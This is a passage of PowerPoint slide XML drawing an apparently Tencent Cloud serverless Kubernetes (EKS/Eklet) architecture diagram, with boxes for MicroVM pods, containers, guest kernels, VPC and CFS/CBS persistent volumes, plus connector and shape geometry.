              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="圆角矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F459AA-715E-6A4D-8E1E-DD76EA2CF773}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6543303" y="4254252"/>
              <a:ext cx="1639574" cy="1895505"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11870"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6E8D4"/>
            </a:solidFill>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="FF0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b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3130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6895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0025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3155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66920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0050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3815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06945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MicroVM</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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/Pod</a:t>
              </a:r>
              <a:endPara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矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D834F6AC-43B7-674B-87D4-CA50FFBA8C30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6679351" y="4914837"/>
              <a:ext cx="1336492" cy="347926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3130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6895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0025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3155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66920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0050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3815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06945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1600" dirty="0"/>
                <a:t>container</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94C57AC-7984-D743-988B-5395461F0E87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6679351" y="5396465"/>
              <a:ext cx="1336492" cy="369333"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="9892A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3130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6895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0025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3155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66920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0050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3815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06945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1600" dirty="0"/>
                <a:t>Guest</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                <a:t>Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED07879B-5F5E-EA42-BCF1-9CFF68A750B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6679351" y="4426332"/>
              <a:ext cx="1336492" cy="347926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3130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6895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0025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3155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66920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0050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3815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06945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1600" dirty="0"/>
                <a:t>container</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p: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F064ADC2-3729-2041-884C-24F281B5E04C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="24" idx="2"/>
              <a:endCxn id="44" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5571727" y="3468159"/>
              <a:ext cx="530692" cy="1040804"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3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1184D496-6DFD-7E46-9F3C-FECCA8C3E127}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="24" idx="2"/>
              <a:endCxn id="28" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="6594764" y="3485925"/>
              <a:ext cx="531037" cy="1005615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7A1D7CD9-7B47-6C4C-B93A-EAB86FFA13F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5605885" y="2217973"/>
              <a:ext cx="1503180" cy="524931"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="88D9BE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EKS</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRP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3E4C2ED3-A802-BF44-8602-FE63269771FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5607276" y="1477724"/>
              <a:ext cx="1503180" cy="524931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TencentCloud</a:t>
              </a:r>
              <a:endPara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API</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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9F5C9663-7AB7-164E-8F36-BA8987FEA39A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3081275" y="1477723"/>
              <a:ext cx="1315827" cy="524931"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FAD0BF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N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eklet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="圆角矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2D1561-7E8E-B347-AFE9-21C8147A878C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4496884" y="4253907"/>
              <a:ext cx="1639574" cy="1895505"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11870"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6E8D4"/>
            </a:solidFill>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="FF0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b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3130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6895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0025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3155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66920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0050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3815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06945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MicroVM</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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/Pod</a:t>
              </a:r>
              <a:endPara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5" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE92341D-F013-EB45-B3BE-F88CFB9A3FBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4632932" y="4914492"/>
              <a:ext cx="1336492" cy="347926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3130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6895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0025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3155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66920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0050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3815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06945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1600" dirty="0"/>
                <a:t>container</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02476F08-DAA0-6248-9DC6-B680730FFFA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4632932" y="5396120"/>
              <a:ext cx="1336492" cy="369333"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="9892A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3130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6895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0025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3155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66920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0050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3815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06945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1600" dirty="0"/>
                <a:t>Guest</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                <a:t>Kernel</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1480F42B-03D0-6F4C-8B76-8F02BDCCC2E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4632932" y="4425987"/>
              <a:ext cx="1336492" cy="347926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3130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6895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0025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3155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66920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0050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3815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06945" algn="l" defTabSz="1826895" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="359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1600" dirty="0"/>
                <a:t>container</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0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689D8A1-3E78-094D-9AC2-C5B34132E8C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="37" idx="2"/>
              <a:endCxn id="24" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6357475" y="2742904"/>
              <a:ext cx="0" cy="455380"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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94E44D7-7FE1-0046-82C9-B1D94F0DBCC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="38" idx="2"/>
              <a:endCxn id="37" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6357475" y="2002655"/>
              <a:ext cx="1391" cy="215318"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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FB85B0C2-CC8C-D548-9040-17AE15601409}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="38" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4397102" y="1740189"/>
              <a:ext cx="1210174" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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6D572839-1C5D-8847-B34A-C1A67675F6B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2329685" y="3627287"/>
              <a:ext cx="1149169" cy="524931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CFS</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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32EC1D44-0DDF-904A-ADEA-6A1C8CBA813E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2258620" y="4801924"/>
              <a:ext cx="1315828" cy="806873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CFS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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persistent</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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volume</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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C489E1D2-F0C3-804B-AA2C-9747DF4B2001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9107842" y="3627287"/>
              <a:ext cx="1149169" cy="524931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CBS</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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718AA84-4AF1-9B41-9936-4DD0825C1D6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9024512" y="4798568"/>
              <a:ext cx="1315828" cy="806873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CBS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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persistent</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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volume</a:t>
              </a:r>
              <a:endParaRPr lang="en-CN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F768C72-43B3-7B41-8621-9A3EF19F2824}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="66" idx="2"/>
              <a:endCxn id="67" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9682426" y="4152218"/>
              <a:ext cx="1" cy="646350"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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9C42D3A-08AE-4343-B1B8-9C1926495A00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="62" idx="2"/>
              <a:endCxn id="65" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2904270" y="4152218"/>
              <a:ext cx="12264" cy="649706"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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Elbow Connector 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F953F3FF-F581-E54B-8D23-5A011AB4A82A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37" idx="2"/>
              <a:endCxn id="66" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="7577760" y="1522619"/>
              <a:ext cx="884383" cy="3324952"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24487"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="127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Elbow Connector 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE3A506-9B1A-224A-95F6-F183AEE9D57C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37" idx="2"/>
              <a:endCxn id="62" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4188682" y="1458493"/>
              <a:ext cx="884383" cy="3453205"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24487"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="127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A46E1C80-4514-8147-A3F7-AA44493C40C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="67" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8182877" y="5487277"/>
              <a:ext cx="1034334" cy="3356"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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5389A162-13F4-624D-A076-A91D6B47DEE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="65" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3381749" y="5490633"/>
              <a:ext cx="1084149" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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9723B6EB-61C4-2C41-831B-9FBA509831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8847" y="4914492"/>
              <a:ext cx="841635" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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80E5347-A0CE-6649-BBF1-0E239088C045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3594918" y="5242231"/>
              <a:ext cx="6703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400" dirty="0"/>
                <a:t>mount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C5F4D75-B14E-5345-BE9A-5BA5657E4F34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8400462" y="5215909"/>
              <a:ext cx="6703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400" dirty="0"/>
                <a:t>mount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3E2BBC6-672D-EB4E-BA59-538DEF2D82B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8554573" y="4620024"/>
              <a:ext cx="6431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400" dirty="0"/>
                <a:t>attach</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="Rounded Rectangle 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34AF9BEA-62CE-AA41-BD5E-E6E474C433B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8484505" y="2223378"/>
              <a:ext cx="1149169" cy="524931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VPC</a:t>
              </a:r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A91AED87-B638-8F49-8825-F8B7889891F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37" idx="3"/>
              <a:endCxn id="102" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109065" y="2480439"/>
              <a:ext cx="1375440" cy="5405"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="158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9990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46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C807425E-76D2-C64F-987C-2E7157419C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8925990" y="2697579"/>
            <a:ext cx="2075936" cy="3571103"/>
            <a:chOff x="16826098" y="3731010"/>
            <a:chExt cx="3791632" cy="6296136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Группа 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A09FB6-AE0B-4A41-B3B7-8F110E40B195}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16826098" y="3774949"/>
              <a:ext cx="3791632" cy="6252197"/>
              <a:chOff x="14849475" y="-2009775"/>
              <a:chExt cx="5046663" cy="8321675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Группа 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77B7B4A-22E0-984B-9A64-C477B264C808}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="14849475" y="-555625"/>
                <a:ext cx="701675" cy="774700"/>
                <a:chOff x="14849475" y="-555625"/>
                <a:chExt cx="701675" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="11" name="Группа 55">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6EC7FAC-CEAB-5243-BCDE-240162218A2E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="14973300" y="-384175"/>
                  <a:ext cx="577850" cy="603250"/>
                  <a:chOff x="14973300" y="-384175"/>
                  <a:chExt cx="577850" cy="603250"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="13" name="Freeform 77">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92D73BB-2199-0F43-B891-782AA8F4B0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973300" y="-263525"/>
                    <a:ext cx="441325" cy="482600"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 278 w 278"/>
                      <a:gd name="T1" fmla="*/ 266 h 304"/>
                      <a:gd name="T2" fmla="*/ 236 w 278"/>
                      <a:gd name="T3" fmla="*/ 304 h 304"/>
                      <a:gd name="T4" fmla="*/ 0 w 278"/>
                      <a:gd name="T5" fmla="*/ 36 h 304"/>
                      <a:gd name="T6" fmla="*/ 44 w 278"/>
                      <a:gd name="T7" fmla="*/ 0 h 304"/>
                      <a:gd name="T8" fmla="*/ 278 w 278"/>
                      <a:gd name="T9" fmla="*/ 266 h 3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78" h="304">
                        <a:moveTo>
                          <a:pt x="278" y="266"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="236" y="304"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="44" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="278" y="26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vert="horz" wrap="square" lIns="45715" tIns="22857" rIns="45715" bIns="2285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900"/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="14" name="Freeform 78">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B3303EB-4E22-9749-BF1C-C373A65E2D7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043150" y="-323850"/>
                    <a:ext cx="438150" cy="482600"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 276 w 276"/>
                      <a:gd name="T1" fmla="*/ 266 h 304"/>
                      <a:gd name="T2" fmla="*/ 234 w 276"/>
                      <a:gd name="T3" fmla="*/ 304 h 304"/>
                      <a:gd name="T4" fmla="*/ 0 w 276"/>
                      <a:gd name="T5" fmla="*/ 38 h 304"/>
                      <a:gd name="T6" fmla="*/ 42 w 276"/>
                      <a:gd name="T7" fmla="*/ 0 h 304"/>
                      <a:gd name="T8" fmla="*/ 276 w 276"/>
                      <a:gd name="T9" fmla="*/ 266 h 3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76" h="304">
                        <a:moveTo>
                          <a:pt x="276" y="266"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="234" y="304"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="42" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="276" y="26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vert="horz" wrap="square" lIns="45715" tIns="22857" rIns="45715" bIns="2285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900"/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="15" name="Freeform 79">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A1EA7DD-DBA7-FB43-B57E-054526BAC95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109825" y="-384175"/>
                    <a:ext cx="441325" cy="482600"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 278 w 278"/>
                      <a:gd name="T1" fmla="*/ 268 h 304"/>
                      <a:gd name="T2" fmla="*/ 234 w 278"/>
                      <a:gd name="T3" fmla="*/ 304 h 304"/>
                      <a:gd name="T4" fmla="*/ 0 w 278"/>
                      <a:gd name="T5" fmla="*/ 38 h 304"/>
                      <a:gd name="T6" fmla="*/ 42 w 278"/>
                      <a:gd name="T7" fmla="*/ 0 h 304"/>
                      <a:gd name="T8" fmla="*/ 278 w 278"/>
                      <a:gd name="T9" fmla="*/ 268 h 3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78" h="304">
                        <a:moveTo>
                          <a:pt x="278" y="268"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="234" y="304"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="42" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="278" y="26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vert="horz" wrap="square" lIns="45715" tIns="22857" rIns="45715" bIns="2285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900"/>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Freeform 80">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BB68C0-E2FF-7941-B3D1-1C87BC416A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849475" y="-555625"/>
                  <a:ext cx="330200" cy="349250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 208"/>
                    <a:gd name="T1" fmla="*/ 0 h 220"/>
                    <a:gd name="T2" fmla="*/ 78 w 208"/>
                    <a:gd name="T3" fmla="*/ 220 h 220"/>
                    <a:gd name="T4" fmla="*/ 208 w 208"/>
                    <a:gd name="T5" fmla="*/ 106 h 220"/>
                    <a:gd name="T6" fmla="*/ 0 w 208"/>
                    <a:gd name="T7" fmla="*/ 0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8" h="220">
                      <a:moveTo>
